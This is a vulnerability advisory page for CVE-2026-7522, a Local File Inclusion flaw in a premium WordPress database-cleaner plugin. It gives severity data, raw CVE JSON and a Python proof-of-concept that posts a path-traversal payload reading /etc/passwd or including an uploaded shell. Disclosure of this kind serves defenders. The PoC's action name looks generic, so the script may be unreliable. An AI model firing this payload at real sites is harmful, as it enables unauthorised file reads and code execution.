Security Vulnerability Report
中文
CVE-2026-7522 CVSS 8.8 HIGH

CVE-2026-7522

Published: 2026-05-20 05:16:22
Last Modified: 2026-05-20 13:54:55
Source: [email protected]

Description

The Advanced Database Cleaner – Premium plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.1.0 via the 'template' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Advanced Database Cleaner – Premium <= 4.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-7522 # This script demonstrates the exploitation of the LFI vulnerability. # Attacker needs valid subscriber credentials. import requests target_url = "http://example.com/wp-admin/admin-ajax.php" # Attacker's cookies (Subscriber level) cookies = { "wordpress_logged_in_xxx": "valid_session_cookie_here" } # The vulnerable parameter 'template' # Pointing to a sensitive file (e.g., wp-config.php or an uploaded shell) payload_data = { "action": "adc_ajax_action", "template": "../../../../../../../../etc/passwd" # Or path to a malicious PHP file: "../../wp-content/uploads/shell.php" } try: response = requests.post(target_url, data=payload_data, cookies=cookies) if response.status_code == 200: print("[+] Request sent successfully.") print("[+] Response content:") print(response.text[:500]) # Print first 500 chars else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7522", "sourceIdentifier": "[email protected]", "published": "2026-05-20T05:16:22.327", "lastModified": "2026-05-20T13:54:54.890", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Advanced Database Cleaner – Premium plugin for WordPress is vulnerable to Local File Inclusion in versions up to, and including, 4.1.0 via the 'template' parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to include and execute arbitrary .php files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where .php file types can be uploaded and included."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://docs.sigmaplugin.com/article/97-advanced-database-cleaner-chaneglog", "source": "[email protected]"}, {"url": "https://sigmaplugin.com/downloads/wordpress-advanced-database-cleaner/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/77e4e516-8a12-48ee-9124-27f941b68b13?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.